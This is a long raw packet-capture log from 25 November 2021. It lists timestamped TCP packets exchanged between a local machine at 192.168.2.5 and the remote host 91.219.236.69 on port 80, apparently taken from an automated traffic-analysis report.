                                                                                                                                                  Nov 25, 2021 18:24:09.846343994 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.846362114 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.846365929 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.846380949 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.846399069 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.846400976 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.846419096 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.846436977 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.846437931 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.846455097 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.846473932 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.863796949 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.863848925 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.863893032 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.863934040 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.863936901 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.863965034 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.863976955 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.864021063 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.864037037 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.864061117 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.864100933 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.864109039 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.864145041 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.864182949 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.864187956 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.864222050 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.864265919 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.864265919 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.864311934 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.864352942 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.864358902 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.864394903 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.864438057 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.864438057 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.864487886 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.864528894 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.864535093 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.864578962 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.864623070 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.864624023 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.864671946 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.864715099 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.864717007 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.864758015 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.864795923 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.864804983 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.864876986 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.864923954 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.865044117 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.865087986 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.865128040 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.865133047 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.865170002 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.865207911 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.865210056 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.865248919 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.865293980 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.865297079 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.865334034 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.865376949 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.865381956 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.865422010 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.865468025 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.865469933 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.866681099 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.866733074 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.866764069 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.866822004 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.866827965 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.866868973 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.866871119 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.866913080 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.866946936 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.867147923 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.867177963 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.867207050 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.867208958 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.867240906 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.867269039 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.867297888 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.867317915 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.867321968 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.867326975 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.867357016 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.867387056 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.867407084 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.867419958 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.867465973 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:12.924736023 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:12.962434053 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.182619095 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.182650089 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.182667017 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.182686090 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.182703972 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.182725906 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.182744980 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.182764053 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.182771921 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.182780981 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.182801008 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.183008909 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.221760035 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.225977898 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.226001024 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.226017952 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.226037025 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.226054907 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.226073027 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.226090908 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.226109028 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.226128101 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.226145029 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.226161957 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.226180077 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.226274014 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.226310968 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.226449013 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.226574898 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.226593018 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.226608992 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.226651907 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.226663113 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.226677895 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.226722002 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.226739883 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.226778030 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.226789951 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.264239073 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.264272928 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.264345884 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.264944077 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.268183947 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.268234968 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.268271923 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.268307924 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.268335104 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.268372059 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.270651102 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.270674944 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.270693064 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.270709991 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.271095991 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.271982908 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.272010088 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.272026062 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.272046089 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.272516012 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.273360968 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.273384094 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.273400068 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.273416996 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.273561001 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.273564100 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.273581028 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.273598909 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.273602009 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.273633957 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.273641109 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.273659945 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.273814917 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.273837090 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.273854971 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.273873091 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.273912907 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.273927927 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.274035931 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.274055004 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.274071932 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.274087906 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.274127960 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.274161100 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.274180889 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.274226904 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.274244070 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.274260044 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.274267912 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.274282932 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.274302006 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.274364948 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.274384975 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.312717915 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.312772989 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.312803030 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.312829971 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.312947989 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.312988043 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.313276052 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.313313961 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.313347101 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.313378096 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.313415051 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.313435078 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.313832045 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.313904047 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.313913107 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.313949108 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.313983917 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.314026117 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.314043999 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.314068079 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.314100027 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.314125061 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.314151049 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.314157009 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.314187050 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.314191103 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.314228058 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.314258099 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.314292908 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.314301968 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.314302921 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.314332962 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.314438105 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.314600945 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.314640045 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.314667940 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.314678907 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.314701080 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.314743042 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.314770937 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.314802885 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.314806938 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.314832926 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.314882994 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.314898968 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.314980984 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.315012932 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.315042973 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.315073967 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.315074921 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.315104008 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.315159082 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.315165043 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.315180063 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.315273046 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.315303087 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.315331936 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.315363884 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.315367937 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.315402985 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.315403938 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.315435886 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.315466881 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.315629959 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.315661907 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.315695047 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.315723896 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.315769911 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.315800905 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.315809011 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.315840006 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.315843105 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.315846920 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.315871954 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.315905094 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.315946102 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.315970898 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.315978050 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.315982103 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.316008091 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.316039085 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.316044092 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.316090107 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.316143990 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.349890947 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.349922895 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.349940062 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.349951982 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.350090027 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.350133896 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.350164890 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.350187063 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.350203991 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.350222111 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.350239992 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.350250006 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.350265980 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.350285053 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.350316048 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.350322962 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.350637913 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.432291985 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.432323933 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.432347059 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.432370901 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.432395935 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.432419062 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.432440996 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.432465076 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.432487965 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.432506084 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.432509899 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.432545900 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.432557106 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.432965040 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.432997942 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.433022976 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.433048010 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.433072090 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.433095932 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.433119059 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.433125973 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.433141947 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:13.433151960 CET4976780192.168.2.591.219.236.69
